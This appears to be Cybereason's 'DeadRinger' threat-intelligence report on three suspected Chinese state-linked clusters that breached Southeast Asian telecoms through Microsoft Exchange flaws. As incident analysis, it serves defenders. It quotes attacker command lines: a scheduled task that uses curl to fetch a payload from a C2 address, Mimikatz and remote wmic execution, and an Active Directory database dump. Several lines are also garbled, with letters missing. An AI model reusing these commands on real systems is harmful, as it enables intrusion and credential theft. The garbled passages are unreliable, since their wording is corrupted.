# DeadRinger: Exposing Chinese Threat Actors Targeting Major Telcos **cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos** Written By Cybereason Nocturnus August 3, 2021 | 27 minute read [Following the discovery of Hafnium attacks targeting Microsoft Exchange vulnerabilities, the Cybereason Nocturnus and Incident Response](https://www.cybereason.com/blog/authors/cybereason-nocturnus) teams proactively hunted for various threat actors trying to leverage similar techniques in-the-wild. In the beginning of 2021, the Cybereason Nocturnus Team investigated clusters of intrusions detected targeting the telecommunications industry across Southeast Asia. During the investigation, three clusters of activity were identified and showed significant connections to known threat actors, all suspected to be operating on behalf of Chinese state interests. ----- e epo t co es o t e ee s o t e de ad st at o s pub c ebu e o C a s [st y o State Secu ty o t e ece t](https://www.nytimes.com/2021/07/19/us/politics/microsoft-hacking-china-biden.html) U attac s that exploited vulnerabilities in unpatched Microsoft Exchange Servers and put thousands of organizations worldwide at risk. Exploitation of these same vulnerabilities were central to the success of the attacks detailed in this research. Based on our analysis, we assess that the goal of the attackers behind these intrusions was to gain and maintain continuous access to telecommunication providers and to facilitate cyber espionage by collecting sensitive information, compromising high-profile business assets [such as the billing servers that contain Call Detail Record (CDR) data, as well as key network components such as the Domain Controllers,](https://en.wikipedia.org/wiki/Call_detail_record#:~:text=A%20call%20detail%20record%20(CDR,through%20that%20facility%20or%20device.) Web Servers and Microsoft Exchange servers. _DeadRinger Overview Video_ **[Cluster A: Assessed to be operated by Soft Cell, an activity group in operation since 2012, previously attacking Telcos in multiple](https://attack.mitre.org/groups/G0093/)** [regions including Southeast Asia, which was first discovered by Cybereason in 2019. We assess with a high level of confidence](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers) that the Soft Cell activity group is operating in the interest of China. The activity around this cluster started in 2018 and continued through Q1 2021. **[Cluster B: Assessed to be operated by the Naikon APT threat actor, a highly active cyber espionage group in operation since 2010](https://attack.mitre.org/groups/G0019/)** [which mainly targets ASEAN countries. The Naikon APT group was previously attributed to the](https://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf) [Chinese People’s Liberation Army’s](https://en.wikipedia.org/wiki/People%27s_Liberation_Army) [(PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020). The activity](https://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf) around this cluster was first observed in Q4 2020 and continued through Q1 2021. **Cluster C: A “mini-cluster” characterized by a unique OWA backdoor that was deployed across multiple Microsoft Exchange and** IIS servers. Analysis of the backdoor shows significant code similarities with a previously documented backdoor observed being [used in the operation dubbed Iron Tiger, which was attributed to a Chinese threat actor tracked by various researchers as Group-](http://www.erai.com/CustomUploads/ca/wp/2015_12_wp_operation_iron_tiger.pdf) 3390 (APT27 / Emissary Panda). The activity around this cluster was observed between 2017 and Q1 2021. _The correlation between the three clusters_ It is noteworthy to mention that the Cybereason Nocturnus Team also observed an interesting overlap among the three clusters: In some instances, all three clusters of activity were observed in the same target environment, around the same timeframe, and even on the same endpoints. At this point, there is not enough information to determine with certainty the nature of this overlap -- namely, whether these clusters represent the work of three different threat actors working independently, or whether these clusters represent the work of three different teams operating on behalf of a single threat actor. Regardless, we do offer several plausible hypotheses that might account for this observation. We hope that the information provided in this report will assist in shedding light on further related intrusions, and as time goes by more information will be made available with regard to the connection between the clusters, the suspected threat actors, and the relationship between them. ## Deadringer: Key Findings ----- **dapt** **e,** **e s ste t a d** **as** **e** e g y adapt e attac e s o ed d ge t y to obscu e t e act ty a d a ta persistence on the infected systems, dynamically responding to mitigation attempts after having evaded security efforts since at least 2017, an indication that the targets are of great value to the attackers. **Microsoft Exchange Vulnerabilities Exploited: Similar to the HAFNIUM attacks, the threat actors exploited recently disclosed** vulnerabilities in Microsoft Exchange Servers to gain access to the targeted networks. They then proceeded to compromise critical network assets such as Domain Controllers (DC) and billing systems which contain highly sensitive information like Call Detail Record (CDR) data, allowing them access to the sensitive communications of anyone using the affected telecoms’ services. **[High Value Espionage Targets: Based on previous findings from the Operation Soft Cell Report Cybereason published in 2019,](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers)** as well as other published analysis of operations conducted by these threat actors, it is assessed that the telecoms were compromised in order to facilitate espionage against select targets. These targets are likely to include corporations, political figures, government officials, law enforcement agencies, political activists and dissident factions of interest to the Chinese government. **Operating in the Interest of China: Three distinct clusters of attacks have varying degrees of connection to APT groups Soft Cell,** Naikon and Group-3390 -- all known to operate in the interest of the Chinese government. Overlaps in attacker TTPs across the clusters are evidence of a likely connection between the threat actors, supporting the assessment that each group was tasked with parallel objectives in monitoring the communications of specific high value targets under the direction of a centralized coordinating body aligned with Chinese state interests. ## Acknowledgements Research papers such as this one require collaboration and vigilance from multiple groups within the company. While the bulk of the report was produced by Cybereason Nocturnus researchers Lior Rochberger, Tom Fakterman, Daniel Frank and Assaf Dahan, this research has not been possible without the tireless effort, analysis, attention to details and contribution of the Cybereason Incident Response and Security Operations teams. Special thanks and appreciation goes to Matt Hart, Akihiro Tomita, Yusuke Shimizu, Fusao Tanida, Niv Yona, Eli **Salem, Ilan Sokolovsky, and Omer Yampel.** [We invite you to join us for a webinar on Thursday, August 12th, at 1:00 PM ET / 10:00 AM PT where Cybereason's Head of Threat Research](https://www.cybereason.com/deadringer-exposing-chinese-threat-actors-targeting-major-telcos) Assaf Dahan and VP of Security Practices Mor Levi will walk through the espionage operations uncovered in the DeadRinger report. ### Table of Contents **Executive Summary** **Key Findings** **Cluster A: Suspected Soft Cell Activity (2018-2021+)** Phase 1: Key Detected Activity Phase 2: Significant Changes in TTPs Phase 3: Significant Changes in TTPs Phase 4: Significant Changes in TTPs Similarities to Operation Soft Cell **Cluster B: Suspected Naikon APT Activity** Maintaining Foothold: The Nebulae Backdoor Living Off the Land - Using Built-In WindowsTools Lateral Movement: PAExec Lateral Movement: WMI and Net use Credential theft Mimikatz Credential Theft: EnrollLoger Keylogger **Cluster C: OWA Backdoor Activity (Mini-Cluster)** Custom OWA Backdoor - Core Functionality Similarities with Iron Tiger OWA Backdoors Connections to Winnti’s Tools and Infrastructure ----- oss b e Co ect o et ee op c oope a d So t Ce Attributing Clusters A, B and C A Note on CTI Attribution **Conclusion** **MITRE ATT&CK BREAKDOWN (Cluster A - Soft Cell Activity)** **MITRE ATT&CK BREAKDOWN (Cluster B - Suspected Naikon APT Activity)** **MITRE ATT&CK BREAKDOWN (Cluster C - Custom OWA Backdoor)** ### Cluster A: Suspected Soft Cell Activity (2018-2021+) Following up on Cybereason’s [discovery of the Soft Cell activity group in 2019, the Nocturnus Team continued to track the group’s activity and](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers) related breaches, which led us to find evidence that the group continued its operation - targeting Telcos in various regions, especially in Southeast Asian countries, all the way to mid-2021. Similar to our 2019 report, the attackers practiced the “Low and Slow“ approach, allowing them to maintain access and conduct their activity clandestinely without alerting the end users nor the security teams. Based on our investigation, this cluster consisted of four main phases, with earliest signs of intrusion going back to 2018. Each phase of the operation demonstrates the attackers’ adaptiveness in how they responded to various mitigation efforts, changing infrastructure, toolsets, and techniques while attempting to become more stealthy. Though the attackers did change some of their tools and techniques since their exposure, their core modus operandi and tools still seem to be inline with our previous findings. From the telemetry and forensic evidence available to us, it appears that the attackers gained initial access to the network by exploiting several [vulnerabilities in Microsoft Exchange servers, including the recent set of vulnerabilities published by Microsoft in March 2021. It is noteworthy](https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/) to mention that it appears the attackers had exploited the recent Microsoft Exchange vulnerabilities long before they became publicly known: _Timeline of the attack - Cluster 1_ ### Phase 1: Key Detected Activity Each phase starts with the exploitation of several Microsoft Exchange server vulnerabilities which grant the attackers an initial foothold on the targeted network, ultimately allowing them to compromise additional assets. Following the exploitation, the attackers installed the China Chopper WebShell on the compromised server and used it to perform a variety of tasks at each phase In the first phase the attackers mainly ----- ocused o eco a ssa ce act ty, app g out t e et o a d de t y g c t ca assets add t o, t ey dep oyed ot e too s t at a o ed them to harvest credentials, move laterally in the network, and exfiltrate data: _China Chopper WebShell activity as seen in the Cybereason Defense Platform_ [It is interesting to note that initially the attackers staged many of their tools in the $RECYCLE.BIN folder, in an attempt to hide them from users](https://attack.mitre.org/techniques/T1074/) and potentially avoid automatic detection by certain security tools. The exact same technique was also documented by Cybereason in our 2019 [report Operation Soft Cell:](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers) ### Reconnaissance [During the reconnaissance phase, the attackers used various built-in Windows tools such as net,](https://attack.mitre.org/software/S0039/) [query,](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/query-process) [whoami,](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami) [tasklist,](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tasklist) [hostname, and](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname) [ping](https://attack.mitre.org/software/S0097/) for internal and external connectivity checks: _Reconnaissance commands executed via China Chopper WebShell_ In addition, the attackers used different scripts for reconnaissance. For example, one of the scripts is called “test.bat” and was used to execute [PortQry, a command-line utility that helps troubleshoot TCP/IP connectivity issues that reports the status of TCP and UDP ports on a remote](https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/portqry-exe-command-line-utility) [machine, which can also be used for Active Directory reconnaissance. The binary itself was renamed to “psc.exe” by the attacker, probably in](https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/use-portqry-verify-active-directory-tcp-ip-connectivity) an attempt to avoid detection. [The second script found was psloglist.bat, which runs Microsoft’s Sysinternals PsLogList tool and saves the security logs from the event viewer](https://docs.microsoft.com/en-us/sysinternals/downloads/psloglist) from the last 10 days: _The content of psloglist.bat_ ### Credential theft ----- oug out t e ope at o, t e attac e s used a ous too s a d tec ques to a est c ede t a s e ost co o too t ey used s t e [notorious Mimikatz. In the first phase, the attackers used the well-known PowerShell Empire Invoke-Mimikatz script, which was stored in the](https://attack.mitre.org/software/S0002/) same directory as the WebShell itself: _Malware alert for nm.sp1 - PowerShell Empire invoke Mimikatz script_ The credentials were sent back to the attackers and were used for lateral movement and privilege escalation. ### Lateral Movement [The attackers used different methods and tools to move laterally to different endpoints on the network, such as Cobalt Strike implants, WMI](https://attack.mitre.org/techniques/T1047/) and Net Use. ### WMI and Net Use The attackers used the command “net use” to configure connections to shared resources on the network, and to copy their tools to different systems. After the tools were copied, the attackers were able to execute them remotely using WMI and by creating scheduled tasks remotely to run them: _Net Use commands as seen in the Cybereason Defense Platform_ _Creation of remote scheduled tasks_ _Executing scripts remotely using WMI_ ### Data Exfiltration In an attempt to hide the contents of the stolen data, the threat actors [compressed and password-protected the data using the WinRAR tool.](https://attack.mitre.org/techniques/T1560/) The RAR files were then placed in the C:\users\SUPPORT_388945a0\Documents folder. This folder belongs to a built-in user account (SUPPORT_388945a0) that is used for help and support service, which is disabled by default but was purposefully enabled by the attacker. The data was then exfiltrated using the China Chopper WebShell. It is also interesting to mention that the nefarious use of this specific account (SUPPORT_388945a0) was previously seen with the Chinese APT3 and the [Iranian Leafminer threat actors:](https://gist.github.com/MSAdministrator/7a61025263e279a740835da4b205e6d0) ----- _Evidence of archived collected data using China Chopper_ Knowing what data the attackers tried to exfiltrate can sometimes shed light on the attackers’ motivations. In our previous report about Soft Cell, we were able to determine that the attackers exfiltrated CDR data from telecommunication providers in order to facilitate cyber espionage against specific individuals. ### Maintaining Foothold: PcShare Backdoor [Aside from the China Chopper WebShell, the attackers relied heavily on a known backdoor named PcShare, whose](https://github.com/LiveMirror/pcshare) [code is publicly available](https://github.com/LiveMirror/pcshare) [and was reported being mostly used by Chinese threat actors attacking Southeast Asian countries. PcShare has the following capabilities:](https://blogs.blackberry.com/en/2019/09/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware) Controlling the file system Manipulation of system services Uploading and downloading files Process manipulation Manipulating the Windows Registry Executing arbitrary commands using Windows CMD Shell Rebooting/shutting down the system Display message boxes to the user PcShare was executed via a Loader DLL (NvSmartMax.dll) and a Payload (NvSmartMax.dat) attempting to masquerade as a legitimate module by NVIDIA named “NvSmartMax.dll”: “NVIDIA Smart Maximise Helper Host” application (part of NVIDIA GPU graphics driver). [In most cases, the attackers used the legitimate nvSmarEx.exe to side-load the loader DLL (“NvSmartMax.dll”). The loader then decrypts the](https://attack.mitre.org/techniques/T1574/002/) PcShare core payload (“NvSmartMax.dat”) placed on the same directory. Interesting to note, the payload .dat file that was used during this [attack has the exact same hash mentioned in a report by BlackBerry from 2019, detailing the same execution technique used to stealthily load](https://blogs.blackberry.com/en/2019/09/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware) PcShare into memory. Cybereason observed that in addition to what was reported by BlackBerry, the NvSmartMax.dll was also executed directly via rundll32.exe in certain instances: _PcShare execution graph_ The execution of the backdoor on the remote machine revealed additional activities performed by the attackers, including: Reconnaissance activity to collect information about the endpoint and network Searching for security tools and attempting to disable or kill their processes Creating two scheduled tasks for the Cobalt Strike loader: Microsoft\Windows\Wininet\Config and Microsoft\Windows\WindowsColorSystem\Config [Using PowerShell to alter the creation time of the Cobalt Strike loader and payload files, a technique called timestomping, which is used](https://attack.mitre.org/techniques/T1070/006/) for detection evasion Executing the Cobalt Strike loader ----- _The execution of the PcShare backdoor as seen in the Cybereason Defense Platform_ ### PcShare Continuously in Use Since 2018 Our investigation revealed that the attackers were operating in the target network for at least two and a half years before Cybereason was deployed on the environment. One piece of evidences that the attackers were present in the network from 2018 is the creation time of the PcShare binary: _Creation time of the PcShare backdoor as seen in the Cybereason Defense Platform_ Another piece of evidence that supports the assessment that the attackers were inside the network since 2018 is that the same IP address that was hard-coded inside the PcShare backdoor mentioned above was also used in a scheduled task. The scheduled task used curl.exe binary in order to download a payload (a CAB file that contains the file “nvSmartEx.exe”) from the mentioned C2 and save it in the recycle.bin folder: ----- _Scheduled task - [cmd.exe /c c:\$recycle.bin\curl.exe http://45.123.118[.]232/1.txt >c:\$recycle.bin\1.txt]_ _The same IP address, embedded inside the PcShare binary_ In addition to the scheduled task above, the attackers created another scheduled task with the same name (VV1) on other machines in the network. This task was different from the one above, and it was used to execute a bat script located under c:\$recycle.bin\q.bat, also created by the attackers. ### Installing a VPN [In order to maintain persistence in the network and create easy access point to the network, the attackers installed SoftEther VPN, which they](https://www.softether.org/) renamed to “oracll.exe” in order to evade detection. SoftEther helps disguise the traffic as benign on the target network. The same VPN client was [previously observed in attacks involving the Soft Cell activity group:](https://attack.mitre.org/groups/G0093/) _Renamed SoftEther VPN binary_ ### Phase 2: Changes in TTPs In addition to the activities performed in the first phase, such as reconnaissance activity or the use of PcShare and WMI - the attackers also used tools that were not used by them in the previous phase. [The attackers used a tool called Local Group, which is useful for adding and enumerating users in a domain, and a different Mimikatz, this time](https://www.joeware.net/freetools/tools/lg/index.htm) using a DLL search order hijacking technique. [The attackers used the Local Group binary lg.exe with the command “-lu” that, according to the usage guide, enumerates all local groups and](https://www.joeware.net/freetools/tools/lg/usage.htm) members on a domain. This was executed remotely on the DC server, and the output was saved into “1.txt”: _Executing lg.exe - local group, and saving the output to 1.txt_ As mentioned, the attackers used the DLL search order hijacking technique in order to load Mimikatz. To do so, the attackers replaced the legitimate DLL “mscorsvc.dll” and then executed the binary “mscorsvw.exe” which loads this DLL: ----- _Preparing the files for DLL search order hijacking of the malicious mscorsvc.dll_ [From the activities observed, the DLL executed Mimikatz, performed Pass-the-Hash and credential dumping, and performed some](https://attack.mitre.org/techniques/T1550/002/) reconnaissance commands using “net user”: _Execution of the mscorsvw.exe process with the malicious search order hijacked DLL, mscorsvc.dll_ ### Phase 3: Changes in TTPs The third phase shares similarities with the initial phases, yet has its own unique characteristics, namely, with the introduction of new tools that were not observed in the previous phases. [Those tools include a script used for AD database dumping, NBTScan,](https://sectools.org/tool/nbtscan/) [Dump Event Log tool, and again, a new Mimikatz executable. The](https://www.activexperts.com/admin/reskit/reskit2000/dumpel/) [attackers ran a script named a.bat remotely on several DCs, which is used to dump the Active Directory Database file (ntds.dit) using](https://adsecurity.org/?p=2398) NTDSUTIL’s IFM Creation (VSS shadow copy): _The creation, execution and deletion of a.bat_ ----- _The execution of a.bat as seen in the Cybereason Defense Platform_ The attackers extended their reconnaissance activity in phase three by executing NBTScan (named smnbt.exe), which is used for scanning IP networks for NetBIOS naming information, in addition to other native tools such as query.exe and dsget.exe: _Execution of the WebShell as seen in the Cybereason Defense Platform_ As observed in the other phases, the attackers harvested credentials using Mimikatz, but this time it was an executable (.exe) file named s6.exe and 26.exe (both have the same hash). The process was executed both by the WebShell and by using WMI. The output was saved into a file named “1.txt” and “log.log”, and later sent to the attackers: _Saving the output of Mimikatz to 1.txt and log.log_ ### Phase 4: Changes in TTPs The only addition observed between phase four compared to previous phases is that the attackers once again used a different Mimikatz executable named d64.exe. It was found in both folders: c:\windows\d64.exe and c:\compaq\d64.exe: ----- _Prevention of d64.exe - Mimikatz_ ### Similarities to Operation Soft Cell [During the investigation, there were significant similarities to the activity described in Operation Soft Cell. Here are some of the similarities](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers) between the investigations: **Category** **Cluster A: Suspected Soft Cell Activity** **Operation Soft** **Cell** **Naming convention** Tools saved under C:\PerfLogs\ C:\perflogs\s6.exe (Mimikatz) c:\perflogs\msnbt.exe (NBTScan) c:\perflogs\lg.exe (Local Group) Tools saved under C:\PerfLogs\ C:\perflogs\pl6.exe (Mimikatz) C:\perflogs\nbt.exe (NBTScan) c:\perflogs\lg.exe (Local Group) Mimikatz execution: "cmd" /c cd /d C:\PerfLogs\&s6.exe >1.txt&echo [S]&cd&echo [E] Running a script named “a.bat” remotely, using WMI: wmic /node:[REDACTED] process call create a.bat&echo [S]&cd&echo [E] Mimikatz execution: "cmd" /c cd /d C:\PerfLogs\&pl6.exe > 1.txt&echo [S]&cd&echo [E] Running a script named “a.bat” remotely, using WMI: wmic /node:[REDACTED] /user:"[REDACTED]" /password:" [REDACTED]" process call create a.bat&echo [S]&cd&echo [E] ----- **Shared tools used** Local Group (renamed “lg.exe” in both cases) PortQry (renamed “psc.exe” in both cases) SoftEther VPN (renamed in both cases) NBTScan (renamed in both cases) China Chopper WebShell Cobalt Strike Payloads NET commands Modified Mimikatz WMI **Techniques / procedures** Exploiting the Exchange server every few months Change IOCs between phases Hiding tools in the recycle.bin folder Use of the DLL search order hijacking technique Renaming binaries In addition to the similarities observed among TTPs, there was another connection to the original Soft Cell report. In following the infrastructure [of the Soft Cell activity group and analyzing their tools, one tool got our attention: d64.exe, the Mimikatz binary observed in phase 4. This file’s](https://www.virustotal.com/gui/file/63adcd46ffd4c3b3959331723b6f97995731c5b299ec89ca7179fa7e708dc004/detection) [PDB pattern is very similar to other tools observed in the Operation Soft Cell report and related samples:](https://github.com/yt0ng/cracking_softcell/blob/main/Cracking_SOFTCLL_TLP_WHITE.pdf) **PDB path observed in d64.exe** **PDB found in previous Soft Cell binaries** E:\vs_proj\mimkTools\dcsync_new\x64\dcsync64.pdb E:\simplify_modify\x64\simplify.pdb E:\vs_proj\simplify_modify\Win32\simplify.pdb Pivoting from the files observed in the attack, other malicious files with the same PDB patterns (“E:\vs_proj\*” and "E:\simplify_modify\*") were found which could be part of the Soft Cell activity group arsenal. Please refer to Appendix A for further details. ### Cluster B: Suspected Naikon APT Activity During our investigation, as more evidence was collected, Cybereason identified another cluster of activity targeting Telcos in ASEAN countries. This cluster exhibits rather unique TTPs compared to the ones detailed in Cluster A; namely the use of different tools and C2 server infrastructure. In addition, this cluster’s activity was first observed in Q4 of 2020, while Cluster A goes back to 2018. [The main tool used in this cluster is the newly discovered Nebulae backdoor, which according to BitDefender is attributed to the Naikon APT](https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf) group. In addition, the attackers deployed a previously undocumented keylogger dubbed “EnrollLoger” on selected high-profile assets, most likely to obtain sensitive information and to harvest credentials of high-privilege user accounts. As previously mentioned, while Cluster B has its unique characteristics that separate it from Cluster A, there were some overlaps observed in terms of the victimology, time frame, the endpoints and some generic tools that were also observed in cluster A. ### Maintaining Foothold: The Nebulae Backdoor [One of the unique tools spotted in the course of the attack is the rare Nebulae backdoor, which was first reported in April 2021 and attributed to](https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf) the [Naikon group. The attackers evidently tried to evade detection by executing the backdoor in the context of legitimate and trusted](https://malpedia.caad.fkie.fraunhofer.de/actor/naikon) [applications that are vulnerable to DLL Side-Loading.](https://attack.mitre.org/techniques/T1574/002/) [For example, the attackers used the legitimate “chrome_frame_helper.exe” - which is part of Google's “Google Chrome Frame” - to load the](https://en.wikipedia.org/wiki/Google_Chrome_Frame) fake module “chrome_frame_helper.dll”, which contained the Nebulae backdoor payload: ----- _Nebulae Backdoor execution as seen in the Cybereason Defense Platform_ Once Cybereason blocked and quarantined “chrome_frame_helper.dll”, the attackers immediately adapted by deploying the Nebulae backdoor [via a new legitimate application that is vulnerable to DLL Side-Loading. This time the attackers used “patchwrap.exe” which is a “Symantec](https://attack.mitre.org/techniques/T1574/002/) Client Management Component” that loads the malicious module “atl110.dll”. As displayed below in the Cybereason Defense Platform, the exploitation of trusted security tools and especially anti-virus software is a very known tactic used by many threat actors: _Nebulae Backdoor execution of various tasks as seen in the Cybereason Defense Platform_ The main features of the Nebulae backdoor include: Reconnaissance and information gathering about infected hosts File and process manipulation Execution of arbitrary commands Privilege escalation C2 communications using raw sockets ----- C data e c ypt o o co u cat o bet ee t e C a d t e ta get According to analysis of the backdoor’s code, we suspect that even though the Nebulae backdoor was first reported in April 2021, based on a [file uploaded to VT in January 2016, there are indications that first versions of the Nebulae backdoor were already being used since 2016:](https://www.virustotal.com/gui/file/d35c0cbcb05366f168d5a12a229f91a8f678b93fb2c08d1968bab1681c3ed3e7/details) _Historic submission data of an early Nebulae sample_ The backdoor communicates with the C2 in what seems to be a somewhat custom implementation of an RC4 encryption algorithm. Initially it using a XOR key to decrypt the C2: _Decryption of the C2_ Following this procedure, the malware collects data about the infected machine such as the user and machine names, operating system version etc., then encrypts it and sends it to the C2. It then awaits further instructions and jumps to the corresponding method: _Jumptable for code execution according to the appropriate value_ ### Reconnaissance Living Off the Land - Using Built-In WindowsTools In order to collect information about the network and endpoints, the attackers used different built-in Windows tools such as net commands, queser, reg, systeminfo, tasklist, netstat, and ping for internal and external connectivity checks. In addition, the attackers used system commands in order to perform a Ping scan, using the command “find /i"ttl” to check for successful connections: ----- _Execution of legitimate tools for reconnaissance and lateral movement as seen in the Cybereason Defense Platform_ ### Lateral Movement PAExec [The attackers used a renamed PAExec for lateral movement. PAExec is similar to sysinternal’s](https://www.poweradmin.com/paexec/) [PsExec, and it is a redistributable version of](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) PsExec with some additional options. PAExec was used to connect to remote servers and execute additional tools. Both PAExec and PsExec are very common legitimate tools that are seen over and over in the context of cyberattacks and used by many threat actors: backup.exe \\ cmd.exe ### WMI and Net use The attackers used the command “net use” in order to access shared network resources on remote machines. Additionally, WMI was used to execute tools such as the Nebulae Backdoor remotely.: wmic /node: /user: /password: process call create "C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\PatchWrap.exe" ### Credential theft [The attackers used sysinternals’ ProcDump and](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) [Mimikatz to dump credentials from the domain controllers.](https://www.varonis.com/blog/what-is-mimikatz/) ### ProcDump ProcDump is a tool by Windows Sysinternals that is able to create dumps of processes in the system. The original purpose of ProcDump is to create dumps for troubleshooting issues, however attackers may use the tool in order to dump critical processes like lsass.exe for the purpose of extracting password hashes from its memory: ----- _PAExec and ProcDump execution as seen in the Cybereason Defense Platform_ ### Mimikatz [The attackers used Mimikatz that masquerades as Internet Explorer. The metadata of the Mimikatz executable, along with the icon, were](https://www.varonis.com/blog/what-is-mimikatz/) altered to appear as an Internet explorer binary in an effort to be stealthy. Additionally, another Mimikatz executable similarly masquerades as Google Chrome, and was found among the tools of cluster B: _PAExec and Mimikatz execution as seen in the Cybereason Defense Platform_ ### EnrollLoger Keylogger [One of the tools used by the attackers was a custom-built keylogger dubbed “EnrollLogger” by Cybereason. In order to hide the malicious](https://en.wikipedia.org/wiki/Keystroke_logging) [activity, the attackers deployed a legitimate South-Korean multimedia player called “Potplayer” that has a](https://en.wikipedia.org/wiki/PotPlayer) [known DLL-hijacking vulnerability,](https://github.com/fireeye/DueDLLigence) along with a trojanized DLL file called PotPlayer.dll.txt [(VT link) that is loaded to Potplayer.exe upon execution, making it appear legitimate:](https://www.virustotal.com/gui/file/ea2c87eb957a749560237b19b82f7136330b9781d449dd22809154385ef1c032/detection/f-ea2c87eb957a749560237b19b82f7136330b9781d449dd22809154385ef1c032-1613619579) _Keylogger execution as seen in the Cybereason Defense Platform_ At the time of the attack, the malicious DLL had a very low detection rate: _Detection rate of the keylogger in VirusTotal_ The fake DLL has several empty exports, and the export that contains the malicious code is called PreprocessCmdLineExW. [The keylogger uses the GetKeyState() function to monitor the users’ keystrokes, saving it to an allocated buffer in memory.](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getkeystate) In addition, the keylogger also steals data stored on Windows’ Clipboard. The collected keystrokes and clipboard data along with other information is then XOR-encrypted (each byte with 0xaf if it equals zero, or with 0xaa in case it doesn’t) and saved in text files located in a directory created by the keylogger: ----- _C \Use s\use \ pp ata\ oa_ _g\_ _c oso t\ et o_ _\cac e_ _Data saved by the keylogger_ An example of a decrypted file looks like this: _Decrypted data file that was collected by the Keylogger_ ### Cluster C: OWA Backdoor Activity (Mini-Cluster) During the investigation, we revealed a third cluster, which is in fact a mini-cluster characterized mainly by the deployment of multiple instances of a custom [OWA (Outlook Web Access) backdoor. The backdoor was used to harvest credentials of users logging into Microsoft OWA](https://en.wikipedia.org/wiki/Outlook_on_the_web) services, granting the attackers the ability to access the environment stealthily. According to the forensic evidence available to us, the earliest indications of use of this backdoor begin in 2017. The deployment of the backdoor continued all the way to 2021, bearing the hallmark of a true advanced persistent threat (APT). From 2017-2020 we have observed only a few instances of the backdoor. However, in March 2021, the attackers installed the backdoor on over 20 machines in a short period of time. This interesting uptick could be explained by the fact that the attackers lost access due to mitigation efforts and needed to re-establish it. Another possible explanation could be related to Microsoft releasing patches for the newly discovered Microsoft Exchange Server vulnerabilities, which caused a sharp rise in attacks against Microsoft Exchange Servers that were unpatched. Code analysis of this backdoor showed considerable similarities with previously documented backdoors dubbed “Dllshellexc2007” and [“Dllshellexc2010”, which were discovered by TrendMicro in their Operation Iron Tiger report and attributed to Group-3390 (also tracked by](https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/2015.09.17.Operation_Iron_Tiger/wp-operation-iron-tiger.pdf) some vendors as APT27, Emissary Panda). According to the Iron Tiger report, the backdoor is compatible and can integrate with the China Chopper WebShell. The activity of this backdoor however, could not be tied directly to the other clusters, which is why we decided to keep it as a separate cluster. That being said, there were some instances where we have observed this backdoor deployed on the same victim as clusters A and B, around the same time frames, and in some cases even on the same endpoints. Given these overlaps and the previously documented compatibility of this OWA backdoor with the China Chopper WebShell, it is possible that Cluster C is somehow related to the activity described in Cluster A, yet a direct connection between the two was not observed in our investigation. ### Custom OWA Backdoor - Core Functionality The custom .NET backdoor deployed is named “Microsoft.Exchange.Clients.Event.dll” and can be installed on either Microsoft Exchange or Internet Information Services (IIS) servers. The main purpose of this backdoor is to harvest credentials of any user that authenticates to OWA services. In addition, the backdoor also contains further functionality similar to a WebShell, allowing the attackers to run arbitrary commands, exfiltrate data and deploy additional tools. ----- e b a y tse s ob uscated t eacto, c s a code p otect o a d so t a e ce s g syste s d o ob uscat o software is often used by malware authors in an effort to hinder analysis. The backdoor intercepts requests that contain “owa/auth.owa'' in the URI (a default login URI for OWA), and steals the login credentials: _The backdoor checks the URI of the http request_ The backdoor logs the following information from the HTTP requests: Connection date and time Remote IP address Username and password used to login User agent In order to protect the stolen data, the backdoor XORes each byte of the collected information with the value “183”, and saves the result in base64 encoding to a file named “~ex.dat” in the %temp% directory. If the attacker connects to the server with a specifically crafted session id, the attacker's http request is parsed in order to execute various commands, such as: Downloading additional files Uploading files (for data exfiltration) Deleting files Executing arbitrary commands via CMD Shell ### Similarities with Iron Tiger OWA Backdoors The “Microsoft.Exchange.Clients.Event.dll” backdoor discussed in this section exhibits both code and functional similarities to a module named [“Microsoft.Exchange.Clients.Auth.dll” that is described in a presentation by Steven Adair and a paper by TrendMicro about operation “Iron](https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/5009/HTA-F02-Detecting-and-Responding-to-Advanced-Threats-within-Exchange-Environments.pdf) Tiger”, which describe sophisticated custom .NET backdoors dubbed “Dllshellexc2007” and “Dllshellexc2010”: _Example of similar code shared between the two modules_ In addition, the credentials log file created by both modules is very similar in its structure and collected data: **Iron Tiger Backdoor - decoded log file of “Microsoft.Exchange.Clients.Auth.dll” (“Dllshellexc2007” and “Dllshellexc2010” backdoors):** 239073 3/2/2015 10:22:09 AM x.x.x.x Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 **Cluster C OWA Backdoor - decoded log file of “Microsoft.Exchange.Clients.Event.dll”:** 1/1/2021 5:32:22 PM x.x.x.x Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66 ### 